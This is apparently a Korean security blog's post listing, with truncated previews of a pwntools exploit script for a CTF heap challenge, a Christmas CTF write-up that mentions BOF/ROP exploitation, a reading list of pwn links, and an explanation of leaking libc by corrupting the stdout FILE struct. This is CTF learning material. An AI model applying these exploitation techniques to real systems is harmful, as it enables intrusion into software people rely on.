tetct의 heap문제입니다 from pwn import * #context.log_level = 'debug' #p = remote("54.157.217.45", 19669) p = process('./oldschool') e = ELF("./oldschool") #l = e.libc l = ELF("./libc-2.23.so") #context.log_level = 'debug' def add(size, data): p.recvuntil(": ") p.sendline('1') sleep(0.3) p.recvuntil(": ") p.send(str(size)) sleep(0.3) p.recvuntil(": ") p.send(str(data)) sleep(0.3) def edit(..
[ Christmas CTF ] write-up12월 25일에 한 크리스마스 CTF이다...흑... 10등으로 마무리했다.adultsccomp , Dynamic SQL, Dead file 은 나랑 팀원들이 거의다 풀었는데 점수를 못얻어서 아쉬웠다...쨋든 나는 아침에 조금, 저녁에 조금밖에 못해서 쉬운거 몇개밖에 못풀었다..Solo TestSanta Gameauto injectionMIROMic check되게 쉬운것들 밖에 없다.... 수치.. Solo Test퍼블 먹을 수 있었는데 다른 문제 더 쉬운거 있나 찾아보다가 놓쳤당... summary질문몇개 물어본다 -> 통과하면 bofROP"/bin/sh\x00"이 로되리안 걸려서 cat 으로 플래그 땃다. exploit codefrom pwn import..
To, To, To To read list읽을려고 킵했는데 아직 못본것 & 조금밖에 못본 것 들gdb 꿀팁 : https://nonetype.github.io/pwn/2019/09/23/GDB-usage/srop : https://krrr-1.tistory.com/29?category=821250tcache analyze : https://krrr-1.tistory.com/23?category=821250pthread : https://kimvabel.tistory.com/60AES : https://en.wikipedia.org/wiki/Advanced_Encryption_Standardlibc 2.29 ex : https://krrr-1.tistory.com/114?category=816968exit..
libc leak with stdout struct 도저히 libc leak을 할 벡터가 없을 때, libc leak을 하기 위한 여러가지 테크닉을 익히기 위해서관련된 문서자료들을 읽어보고, 관련함수들을 분석해 보고, 해당 내용들을 정리하기 위해서 한번 작성해봤당. 관련 문제hitcon - baby_tcache pwnable.tw - heap paradiseflow해당 libc leak은 _IO_FILE struct의 flag값을 사용자가 임의의 값으로 바꾸고, _IO_write_base 의 일부를 NULL로 변조함에 따라, puts와 같은 stdout을 사용하는 함수가 사용될 때, 내부 루틴이 꼬이면서 libc가 leak이 되도록 한다. file struct _flag define#define _IO_..